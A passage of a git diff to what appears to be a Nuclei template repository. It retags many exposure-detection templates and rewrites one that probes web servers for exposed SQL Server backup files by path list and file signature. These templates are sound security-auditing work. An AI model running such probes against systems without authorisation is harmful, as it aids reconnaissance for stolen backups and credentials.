exposure,api,tolgee + tags: exposure,api,tolgee,discovery http: - method: GET diff --git a/http/exposures/apis/traefik-api-enabled.yaml b/http/exposures/apis/traefik-api-enabled.yaml index 7c17d8dfb74..12157ce6d33 100644 --- a/http/exposures/apis/traefik-api-enabled.yaml +++ b/http/exposures/apis/traefik-api-enabled.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Traefik" - tags: traefik,exposure,apis + tags: traefik,exposure,apis,discovery http: - method: GET diff --git a/http/exposures/apis/wadl-api.yaml b/http/exposures/apis/wadl-api.yaml index 590790bc9ca..7fc0ecb3d4e 100644 --- a/http/exposures/apis/wadl-api.yaml +++ b/http/exposures/apis/wadl-api.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 8 - tags: exposure,api + tags: exposure,api,discovery http: - method: GET diff --git a/http/exposures/apis/wsdl-api.yaml b/http/exposures/apis/wsdl-api.yaml index d31e6cb36c8..11d3606080b 100644 --- a/http/exposures/apis/wsdl-api.yaml +++ b/http/exposures/apis/wsdl-api.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: exposure,api + tags: exposure,api,discovery http: - method: GET diff --git a/http/exposures/backups/backup-directory-listing.yaml b/http/exposures/backups/backup-directory-listing.yaml index cd512393b9e..081fdbe64c2 100644 --- a/http/exposures/backups/backup-directory-listing.yaml +++ b/http/exposures/backups/backup-directory-listing.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: hackerone,backups,exposure + tags: hackerone,backups,exposure,vuln http: - method: GET diff --git a/http/exposures/backups/exposed-mysql-initial.yaml b/http/exposures/backups/exposed-mysql-initial.yaml index df789842475..9dbbc312968 100644 --- a/http/exposures/backups/exposed-mysql-initial.yaml +++ b/http/exposures/backups/exposed-mysql-initial.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,hackerone + tags: config,exposure,hackerone,vuln http: - method: GET diff --git a/http/exposures/backups/froxlor-database-backup.yaml b/http/exposures/backups/froxlor-database-backup.yaml index a39cc5a8abf..a4fc270f0fc 100644 --- a/http/exposures/backups/froxlor-database-backup.yaml +++ b/http/exposures/backups/froxlor-database-backup.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"Froxlor Server Management Panel" product: froxlor vendor: froxlor - tags: froxlor,backup,exposure,disclosure + tags: froxlor,backup,exposure,disclosure,vuln http: - method: GET diff --git a/http/exposures/backups/mysql-dump.yaml b/http/exposures/backups/mysql-dump.yaml index 8f91e18177b..edd107bd4dd 100644 --- a/http/exposures/backups/mysql-dump.yaml +++ b/http/exposures/backups/mysql-dump.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 21 - tags: exposure,backup,mysql + tags: exposure,backup,mysql,vuln http: - method: GET diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index 92b456bab7a..7bf07f7b007 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -7,7 +7,7 @@ info: description: PHP Source File is disclosed to external users. metadata: max-request: 1512 - tags: exposure,backup,php,disclosure,fuzz + tags: exposure,backup,php,disclosure,fuzz,vuln http: - method: GET diff --git a/http/exposures/backups/settings-php-files.yaml b/http/exposures/backups/settings-php-files.yaml index e02ec813e80..13ba2bae266 100644 --- a/http/exposures/backups/settings-php-files.yaml +++ b/http/exposures/backups/settings-php-files.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 7 - tags: exposure,backup + tags: exposure,backup,vuln http: - method: GET diff --git a/http/exposures/backups/sql-server-dump.yaml b/http/exposures/backups/sql-server-dump.yaml index f9f22d704eb..c70793c2db8 100644 --- a/http/exposures/backups/sql-server-dump.yaml +++ b/http/exposures/backups/sql-server-dump.yaml @@ -1,61 +1,61 @@ -id: sql-server-dump - -info: - name: SQL Server - Dump Files - author: userdehghani - severity: medium - description: | - A SQL Server dump file was found - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 - metadata: - max-request: 21 - tags: exposure,backup,sql-server - -http: - - method: GET - path: - - "{{BaseURL}}{{paths}}" - - payloads: - paths: - - "/sa.bak" - - "/wwwroot.bak" - - "/backup.bak" - - "/database.bak" - - "/data.bak" - - "/db_backup.bak" - - "/dbdump.bak" - - "/db.bak" - - "/dump.bak" - - "/{{Hostname}}.bak" - - "/{{Hostname}}_db.bak" - - "/localhost.bak" - - "/mysqldump.bak" - - "/mysql.bak" - - "/site.bak" - - "/sql.bak" - - "/temp.bak" - - "/translate.bak" - - "/users.bak" - - "/www.bak" - - "/wp-content/uploads/dump.bak" - - "/wp-content/mysql.bak" - - headers: - Range: "bytes=0-500" - max-size: 500 # Size in bytes - Max Size to read from server response - - matchers-condition: and - matchers: - - type: binary - part: body - binary: - - "54415045" # Microsoft Tape Format - - - type: status - status: +id: sql-server-dump + +info: + name: SQL Server - Dump Files + author: userdehghani + severity: medium + description: | + A SQL Server dump file was found + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 21 + tags: exposure,backup,sql-server,vuln + +http: + - method: GET + path: + - "{{BaseURL}}{{paths}}" + + payloads: + paths: + - "/sa.bak" + - "/wwwroot.bak" + - "/backup.bak" + - "/database.bak" + - "/data.bak" + - "/db_backup.bak" + - "/dbdump.bak" + - "/db.bak" + - "/dump.bak" + - "/{{Hostname}}.bak" + - "/{{Hostname}}_db.bak" + - "/localhost.bak" + - "/mysqldump.bak" + - "/mysql.bak" + - "/site.bak" + - "/sql.bak" + - "/temp.bak" + - "/translate.bak" + - "/users.bak" + - "/www.bak" + - "/wp-content/uploads/dump.bak" + - "/wp-content/mysql.bak" + + headers: + Range: "bytes=0-500" + max-size: 500 # Size in bytes - Max Size to read from server response + + matchers-condition: and + matchers: + - type: binary + part: body + binary: + - "54415045" # Microsoft Tape Format + + - type: status + status: - 200 # digest: 4b0a00483046022100d61297db0c2215614777bb99162d894fe05d8a76e5ca101e75e7eba28714d79802210086d48388e4072fe02b712c5599d7a3395589f50eb7ba2976590f2aece87061e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index 4c313e08563..2da998607e3 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1305 - tags: exposure,backup + tags: exposure,backup,vuln http: - method: GET diff --git a/http/exposures/configs/3cx-config.yaml b/http/exposures/configs/3cx-config.yaml index 6be96cbe8a4..5c6158dbee4 100644 --- a/http/exposures/configs/3cx-config.yaml +++ b/http/exposures/configs/3cx-config.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"setupconfig.xml" - tags: 3cx,config,exposure + tags: 3cx,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/accueil-wampserver.yaml b/http/exposures/configs/accueil-wampserver.yaml index 9351d4987eb..5ad79b71c77 100644 --- a/http/exposures/configs/accueil-wampserver.yaml +++ b/http/exposures/configs/accueil-wampserver.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.title:"Accueil WAMPSERVER" product: wampserver vendor: wampserver - tags: exposure,accueil,wampserver,config + tags: exposure,accueil,wampserver,config,vuln http: - method: GET diff --git a/http/exposures/configs/airflow-configuration-exposure.yaml b/http/exposures/configs/airflow-configuration-exposure.yaml index a3a9ac336d5..5d603eb5b71 100644 --- a/http/exposures/configs/airflow-configuration-exposure.yaml +++ b/http/exposures/configs/airflow-configuration-exposure.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: exposure,config,airflow,apache + tags: exposure,config,airflow,apache,vuln http: - method: GET diff --git a/http/exposures/configs/alibaba-canal-info-leak.yaml b/http/exposures/configs/alibaba-canal-info-leak.yaml index ea756f6c241..6a11c5e5caa 100644 --- a/http/exposures/configs/alibaba-canal-info-leak.yaml +++ b/http/exposures/configs/alibaba-canal-info-leak.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,alibaba + tags: config,exposure,alibaba,vuln http: - method: GET diff --git a/http/exposures/configs/amazon-docker-config.yaml b/http/exposures/configs/amazon-docker-config.yaml index 2069efad35b..bbcf446228c 100644 --- a/http/exposures/configs/amazon-docker-config.yaml +++ b/http/exposures/configs/amazon-docker-config.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,aws,devops + tags: config,exposure,aws,devops,vuln http: - method: GET diff --git a/http/exposures/configs/ansible-config-disclosure.yaml b/http/exposures/configs/ansible-config-disclosure.yaml index ae9b2cea3e0..621f9b831f9 100644 --- a/http/exposures/configs/ansible-config-disclosure.yaml +++ b/http/exposures/configs/ansible-config-disclosure.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/apache-config.yaml b/http/exposures/configs/apache-config.yaml index 97e27a4437d..30735b00d8e 100644 --- a/http/exposures/configs/apache-config.yaml +++ b/http/exposures/configs/apache-config.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,apache + tags: config,exposure,apache,vuln http: - method: GET diff --git a/http/exposures/configs/apache-jspwiki-ip-userenum.yaml b/http/exposures/configs/apache-jspwiki-ip-userenum.yaml index 2199f813125..215e032f42d 100644 --- a/http/exposures/configs/apache-jspwiki-ip-userenum.yaml +++ b/http/exposures/configs/apache-jspwiki-ip-userenum.yaml @@ -13,7 +13,7 @@ info: verified: true vendor: apache product: jspwiki - tags: jspwiki,apache,enumeration + tags: jspwiki,apache,enumeration,discovery http: - method: GET diff --git a/http/exposures/configs/apache-kyuubi-config.yaml b/http/exposures/configs/apache-kyuubi-config.yaml index 875fccfb1b4..1215e12efa1 100644 --- a/http/exposures/configs/apache-kyuubi-config.yaml +++ b/http/exposures/configs/apache-kyuubi-config.yaml @@ -12,7 +12,7 @@ info: max-request: 1 vendor: apache product: kyuubi - tags: config,exposure,kyuubi,apache + tags: config,exposure,kyuubi,apache,vuln http: - method: GET diff --git a/http/exposures/configs/apache-ozone-conf.yaml b/http/exposures/configs/apache-ozone-conf.yaml index 241097a0bb0..188a3b4aa57 100644 --- a/http/exposures/configs/apache-ozone-conf.yaml +++ b/http/exposures/configs/apache-ozone-conf.yaml @@ -13,7 +13,7 @@ info: vendor: apache product: ozone shodan-query: title:"Apache Ozone" - tags: tech,ozone,apache,detect + tags: tech,ozone,apache,detect,vuln http: - method: GET diff --git a/http/exposures/configs/apache-pinot-config.yaml b/http/exposures/configs/apache-pinot-config.yaml index 17e2c6a54c6..3c4497c8b61 100644 --- a/http/exposures/configs/apache-pinot-config.yaml +++ b/http/exposures/configs/apache-pinot-config.yaml @@ -14,7 +14,7 @@ info: vendor: apache product: pinot shodan-query: title:"Apache Pinot" - tags: config,exposure,pinot,apache + tags: config,exposure,pinot,apache,vuln http: - method: GET diff --git a/http/exposures/configs/appspec-yml-disclosure.yaml b/http/exposures/configs/appspec-yml-disclosure.yaml index f3eb8d0d2de..8c6ec5775dd 100644 --- a/http/exposures/configs/appspec-yml-disclosure.yaml +++ b/http/exposures/configs/appspec-yml-disclosure.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: exposure,config + tags: exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/appveyor-configuration-file.yaml b/http/exposures/configs/appveyor-configuration-file.yaml index 953a3716847..3ae27f6e144 100644 --- a/http/exposures/configs/appveyor-configuration-file.yaml +++ b/http/exposures/configs/appveyor-configuration-file.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 shodan-query: html:"appveyor.yml" - tags: config,exposure,devops + tags: config,exposure,devops,vuln http: - method: GET diff --git a/http/exposures/configs/aws-config.yaml b/http/exposures/configs/aws-config.yaml index 2c4b71ed26a..87e0ab11f08 100644 --- a/http/exposures/configs/aws-config.yaml +++ b/http/exposures/configs/aws-config.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: config,exposure,aws,credential + tags: config,exposure,aws,credential,vuln http: - method: GET diff --git a/http/exposures/configs/aws-credentials.yaml b/http/exposures/configs/aws-credentials.yaml index ea4e33cd56e..9fc8eab0167 100644 --- a/http/exposures/configs/aws-credentials.yaml +++ b/http/exposures/configs/aws-credentials.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true max-request: 1 - tags: config,exposure,aws,credential + tags: config,exposure,aws,credential,vuln http: - method: GET diff --git a/http/exposures/configs/awstats-config.yaml b/http/exposures/configs/awstats-config.yaml index f90934d16d8..bb9b3f5d9ca 100644 --- a/http/exposures/configs/awstats-config.yaml +++ b/http/exposures/configs/awstats-config.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: config,exposure,awstats + tags: config,exposure,awstats,vuln http: - method: GET diff --git a/http/exposures/configs/awstats-script.yaml b/http/exposures/configs/awstats-script.yaml index a6563551236..6a6d6531038 100644 --- a/http/exposures/configs/awstats-script.yaml +++ b/http/exposures/configs/awstats-script.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 4 - tags: config,exposure,awstats + tags: config,exposure,awstats,vuln http: - method: GET diff --git a/http/exposures/configs/azure-domain-tenant.yaml b/http/exposures/configs/azure-domain-tenant.yaml index 855d8546061..6d5114b604d 100644 --- a/http/exposures/configs/azure-domain-tenant.yaml +++ b/http/exposures/configs/azure-domain-tenant.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: azure,microsoft,cloud,exposure + tags: azure,microsoft,cloud,exposure,vuln http: - raw: diff --git a/http/exposures/configs/babel-config-exposure.yaml b/http/exposures/configs/babel-config-exposure.yaml index 050359b708f..6f19e8478b2 100644 --- a/http/exposures/configs/babel-config-exposure.yaml +++ b/http/exposures/configs/babel-config-exposure.yaml @@ -18,7 +18,7 @@ info: shodan-query: html:"babel.config.js" product: babel vendor: pocoo - tags: exposure,config,file + tags: exposure,config,file,vuln http: - method: GET diff --git a/http/exposures/configs/behat-config.yaml b/http/exposures/configs/behat-config.yaml index 9d21299f1a9..24c4d0673dc 100644 --- a/http/exposures/configs/behat-config.yaml +++ b/http/exposures/configs/behat-config.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 2 shodan-query: html:"behat.yml" - tags: exposure,behat,devops,cicd + tags: exposure,behat,devops,cicd,vuln http: - method: GET diff --git a/http/exposures/configs/blazor-boot.yaml b/http/exposures/configs/blazor-boot.yaml index 06f3d2ce96e..a8cd5b46d13 100644 --- a/http/exposures/configs/blazor-boot.yaml +++ b/http/exposures/configs/blazor-boot.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 github-query: 'blazor.boot.json language:JSON' - tags: blazor,boot,exposure,config,disclosure + tags: blazor,boot,exposure,config,disclosure,vuln http: - method: GET diff --git a/http/exposures/configs/bugzilla-config.yaml b/http/exposures/configs/bugzilla-config.yaml index 0052c4b9cb2..57634aa986f 100644 --- a/http/exposures/configs/bugzilla-config.yaml +++ b/http/exposures/configs/bugzilla-config.yaml @@ -15,7 +15,7 @@ info: vendor: mozilla product: bugzilla shodan-query: title:"Bugzilla" - tags: bugzilla,mozilla,config,exposure + tags: bugzilla,mozilla,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/cakephp-config.yaml b/http/exposures/configs/cakephp-config.yaml index 9838c9b6fcb..55426e764f8 100644 --- a/http/exposures/configs/cakephp-config.yaml +++ b/http/exposures/configs/cakephp-config.yaml @@ -18,7 +18,7 @@ info: shodan-query: html:"phinx.yml" product: cakephp vendor: cakephp - tags: files,exposure,config + tags: files,exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/cgi-printenv.yaml b/http/exposures/configs/cgi-printenv.yaml index 4aeb7273389..30cf7bcfb06 100644 --- a/http/exposures/configs/cgi-printenv.yaml +++ b/http/exposures/configs/cgi-printenv.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: exposure,cgi + tags: exposure,cgi,vuln http: - method: GET diff --git a/http/exposures/configs/circleci-config.yaml b/http/exposures/configs/circleci-config.yaml index e64e96690e0..06fdb6dec9f 100644 --- a/http/exposures/configs/circleci-config.yaml +++ b/http/exposures/configs/circleci-config.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,circleci + tags: config,exposure,circleci,vuln http: - method: GET diff --git a/http/exposures/configs/circleci-ssh-config.yaml b/http/exposures/configs/circleci-ssh-config.yaml index 8557113be5c..73d860bf7bc 100644 --- a/http/exposures/configs/circleci-ssh-config.yaml +++ b/http/exposures/configs/circleci-ssh-config.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,circleci + tags: config,exposure,circleci,vuln http: - method: GET diff --git a/http/exposures/configs/cisco-network-config.yaml b/http/exposures/configs/cisco-network-config.yaml index 598dad073a1..22ce6f1adb4 100644 --- a/http/exposures/configs/cisco-network-config.yaml +++ b/http/exposures/configs/cisco-network-config.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: exposure,cisco,edb,config + tags: exposure,cisco,edb,config,vuln http: - method: GET diff --git a/http/exposures/configs/codeception-config.yaml b/http/exposures/configs/codeception-config.yaml index f2a5dd16d60..cc8c395a234 100644 --- a/http/exposures/configs/codeception-config.yaml +++ b/http/exposures/configs/codeception-config.yaml @@ -13,7 +13,7 @@ info: shodan-query: html:"codeception.yml" product: codeception vendor: codeception - tags: exposure,devops,codeception,config,cicd + tags: exposure,devops,codeception,config,cicd,vuln http: - method: GET diff --git a/http/exposures/configs/codeigniter-env.yaml b/http/exposures/configs/codeigniter-env.yaml index 2a291dc8705..1e2178e8487 100644 --- a/http/exposures/configs/codeigniter-env.yaml +++ b/http/exposures/configs/codeigniter-env.yaml @@ -7,7 +7,7 @@ info: description: Codeigniter .env file was discovered. metadata: max-request: 12 - tags: config,exposure,codeigniter + tags: config,exposure,codeigniter,vuln http: - method: GET diff --git a/http/exposures/configs/collibra-properties.yaml b/http/exposures/configs/collibra-properties.yaml index d3f78300b9e..c57b47aeede 100644 --- a/http/exposures/configs/collibra-properties.yaml +++ b/http/exposures/configs/collibra-properties.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 3 - tags: exposure,config,collibra-properties,collibra + tags: exposure,config,collibra-properties,collibra,vuln http: - method: GET diff --git a/http/exposures/configs/composer-config.yaml b/http/exposures/configs/composer-config.yaml index cbcb865920f..d18b70e703e 100644 --- a/http/exposures/configs/composer-config.yaml +++ b/http/exposures/configs/composer-config.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 4 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/config-json-exposure-fuzz.yaml b/http/exposures/configs/config-json-exposure-fuzz.yaml index 706be34ad96..95213611957 100644 --- a/http/exposures/configs/config-json-exposure-fuzz.yaml +++ b/http/exposures/configs/config-json-exposure-fuzz.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 50 github-query: filename:config.json - tags: config,exposure,files + tags: config,exposure,files,vuln http: - method: GET diff --git a/http/exposures/configs/config-json.yaml b/http/exposures/configs/config-json.yaml index a89b841745d..de86bb11b82 100644 --- a/http/exposures/configs/config-json.yaml +++ b/http/exposures/configs/config-json.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 4 github-query: filename:config.json - tags: config,exposure,files + tags: config,exposure,files,vuln http: - method: GET diff --git a/http/exposures/configs/config-properties.yaml b/http/exposures/configs/config-properties.yaml index 1e36a1cf3ca..d98282aa076 100644 --- a/http/exposures/configs/config-properties.yaml +++ b/http/exposures/configs/config-properties.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 3 - tags: exposure,config,properties + tags: exposure,config,properties,vuln http: - method: GET diff --git a/http/exposures/configs/config-rb.yaml b/http/exposures/configs/config-rb.yaml index 824646c0f23..601f8409b98 100644 --- a/http/exposures/configs/config-rb.yaml +++ b/http/exposures/configs/config-rb.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 3 shodan-query: html:"config.rb" - tags: ruby,devops,exposure,config + tags: ruby,devops,exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/configuration-listing.yaml b/http/exposures/configs/configuration-listing.yaml index 038c8a469d9..f33738d731f 100644 --- a/http/exposures/configs/configuration-listing.yaml +++ b/http/exposures/configs/configuration-listing.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,listing,exposure,edb + tags: config,listing,exposure,edb,vuln http: - method: GET diff --git a/http/exposures/configs/coremail-config-disclosure.yaml b/http/exposures/configs/coremail-config-disclosure.yaml index 7c899470951..f8e6383c594 100644 --- a/http/exposures/configs/coremail-config-disclosure.yaml +++ b/http/exposures/configs/coremail-config-disclosure.yaml @@ -9,7 +9,7 @@ info: - https://www.secpulse.com/archives/107611.html metadata: max-request: 1 - tags: config,exposure,coremail + tags: config,exposure,coremail,vuln http: - method: GET diff --git a/http/exposures/configs/cpanel-config.yaml b/http/exposures/configs/cpanel-config.yaml index 6e51124d3e5..cac8a42ca14 100644 --- a/http/exposures/configs/cpanel-config.yaml +++ b/http/exposures/configs/cpanel-config.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cpanel,config,exposure + tags: cpanel,config,exposure,discovery http: - method: GET diff --git a/http/exposures/configs/cypress-web-config.yaml b/http/exposures/configs/cypress-web-config.yaml index 9669e107dff..4042ae423c9 100644 --- a/http/exposures/configs/cypress-web-config.yaml +++ b/http/exposures/configs/cypress-web-config.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"PendingInstallVZW - Web Page Configuration" - tags: exposure,cypress,pendinginstallvzw,config + tags: exposure,cypress,pendinginstallvzw,config,vuln http: - method: GET diff --git a/http/exposures/configs/dbeaver-credentials.yaml b/http/exposures/configs/dbeaver-credentials.yaml index 2519e406872..7bb7ded9251 100644 --- a/http/exposures/configs/dbeaver-credentials.yaml +++ b/http/exposures/configs/dbeaver-credentials.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-522 metadata: max-request: 2 - tags: exposure,dbeaver + tags: exposure,dbeaver,vuln variables: str: "{{rand_base(6)}}" diff --git a/http/exposures/configs/debug-vars.yaml b/http/exposures/configs/debug-vars.yaml index 364047bace6..8ff46451805 100644 --- a/http/exposures/configs/debug-vars.yaml +++ b/http/exposures/configs/debug-vars.yaml @@ -7,7 +7,7 @@ info: description: Golang expvar function exposes multiple public variables via HTTP such as stack trace information and server operation counters. metadata: max-request: 1 - tags: go,debug,exposure + tags: go,debug,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/deployment-ini.yaml b/http/exposures/configs/deployment-ini.yaml index aac13fb5079..7737da7c72e 100644 --- a/http/exposures/configs/deployment-ini.yaml +++ b/http/exposures/configs/deployment-ini.yaml @@ -14,7 +14,7 @@ info: max-request: 12 vendor: dg product: "ftp-deployment" - tags: config,exposure,dg + tags: config,exposure,dg,vuln http: - method: GET diff --git a/http/exposures/configs/detect-drone-config.yaml b/http/exposures/configs/detect-drone-config.yaml index 90adce024aa..41276b3c6a2 100644 --- a/http/exposures/configs/detect-drone-config.yaml +++ b/http/exposures/configs/detect-drone-config.yaml @@ -9,7 +9,7 @@ info: - https://github.com/drone/drone metadata: max-request: 1 - tags: config,exposure,drone + tags: config,exposure,drone,discovery http: - method: GET diff --git a/http/exposures/configs/django-variables-exposed.yaml b/http/exposures/configs/django-variables-exposed.yaml index 7ac5d58e0c9..cc17e5cbe93 100644 --- a/http/exposures/configs/django-variables-exposed.yaml +++ b/http/exposures/configs/django-variables-exposed.yaml @@ -16,7 +16,7 @@ info: metadata: verified: true max-request: 1 - tags: exposure,config,django + tags: exposure,config,django,vuln http: - method: GET diff --git a/http/exposures/configs/docker-compose-config.yaml b/http/exposures/configs/docker-compose-config.yaml index c5dd456cddf..40ac793f359 100644 --- a/http/exposures/configs/docker-compose-config.yaml +++ b/http/exposures/configs/docker-compose-config.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 7 - tags: config,exposure,devops + tags: config,exposure,devops,vuln http: - method: GET diff --git a/http/exposures/configs/dockercfg-config.yaml b/http/exposures/configs/dockercfg-config.yaml index 253ae776a74..cf6d586339a 100644 --- a/http/exposures/configs/dockercfg-config.yaml +++ b/http/exposures/configs/dockercfg-config.yaml @@ -7,7 +7,7 @@ info: description: Docker registry authentication data metadata: max-request: 2 - tags: docker,exposure,config + tags: docker,exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/dockerfile-hidden-disclosure.yaml b/http/exposures/configs/dockerfile-hidden-disclosure.yaml index 65abf59536c..a84aac04eea 100644 --- a/http/exposures/configs/dockerfile-hidden-disclosure.yaml +++ b/http/exposures/configs/dockerfile-hidden-disclosure.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 3 - tags: exposure,config + tags: exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/dompdf-config.yaml b/http/exposures/configs/dompdf-config.yaml index dbc9442f21a..79b7291b8ab 100644 --- a/http/exposures/configs/dompdf-config.yaml +++ b/http/exposures/configs/dompdf-config.yaml @@ -15,7 +15,7 @@ info: fofa-query: title="dompdf - The PHP 5 HTML to PDF Converter" product: dompdf vendor: dompdf_project - tags: config,exposure,dompdf + tags: config,exposure,dompdf,vuln http: - method: GET diff --git a/http/exposures/configs/editor-exposure.yaml b/http/exposures/configs/editor-exposure.yaml index 5d9dde7cfe5..c410de1dc9c 100644 --- a/http/exposures/configs/editor-exposure.yaml +++ b/http/exposures/configs/editor-exposure.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:"editorconfig" - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/esmtprc-config.yaml b/http/exposures/configs/esmtprc-config.yaml index 9e22e2dc90d..22611ffcbe9 100644 --- a/http/exposures/configs/esmtprc-config.yaml +++ b/http/exposures/configs/esmtprc-config.yaml @@ -9,7 +9,7 @@ info: - https://linux.die.net/man/5/esmtprc metadata: max-request: 1 - tags: esmtp,config,exposure + tags: esmtp,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/exposed-authentication-asmx.yaml b/http/exposures/configs/exposed-authentication-asmx.yaml index c78a43972c7..a875e7355fa 100644 --- a/http/exposures/configs/exposed-authentication-asmx.yaml +++ b/http/exposures/configs/exposed-authentication-asmx.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,edb + tags: config,exposure,edb,vuln http: - method: GET diff --git a/http/exposures/configs/exposed-bitkeeper.yaml b/http/exposures/configs/exposed-bitkeeper.yaml index 4cd273ce016..4ef223cb794 100644 --- a/http/exposures/configs/exposed-bitkeeper.yaml +++ b/http/exposures/configs/exposed-bitkeeper.yaml @@ -9,7 +9,7 @@ info: - https://www.bitkeeper.org/man/config-etc.html metadata: max-request: 1 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/exposed-bzr.yaml b/http/exposures/configs/exposed-bzr.yaml index af55541b238..bd7ede6a98d 100644 --- a/http/exposures/configs/exposed-bzr.yaml +++ b/http/exposures/configs/exposed-bzr.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/exposed-darcs.yaml b/http/exposures/configs/exposed-darcs.yaml index 09e51577a29..a5f6f4ad88f 100644 --- a/http/exposures/configs/exposed-darcs.yaml +++ b/http/exposures/configs/exposed-darcs.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/exposed-gitignore.yaml b/http/exposures/configs/exposed-gitignore.yaml index 08f8692e448..54e775dfb7c 100644 --- a/http/exposures/configs/exposed-gitignore.yaml +++ b/http/exposures/configs/exposed-gitignore.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 3 - tags: exposure,tenable,config,git + tags: exposure,tenable,config,git,vuln http: - method: GET diff --git a/http/exposures/configs/exposed-hg.yaml b/http/exposures/configs/exposed-hg.yaml index 41208747dba..b65e2359270 100644 --- a/http/exposures/configs/exposed-hg.yaml +++ b/http/exposures/configs/exposed-hg.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/exposed-sharepoint-list.yaml b/http/exposures/configs/exposed-sharepoint-list.yaml index 00a2c550485..3e261eea19d 100644 --- a/http/exposures/configs/exposed-sharepoint-list.yaml +++ b/http/exposures/configs/exposed-sharepoint-list.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: hackerone,config,exposure,sharepoint + tags: hackerone,config,exposure,sharepoint,vuln http: - method: GET diff --git a/http/exposures/configs/exposed-svn.yaml b/http/exposures/configs/exposed-svn.yaml index 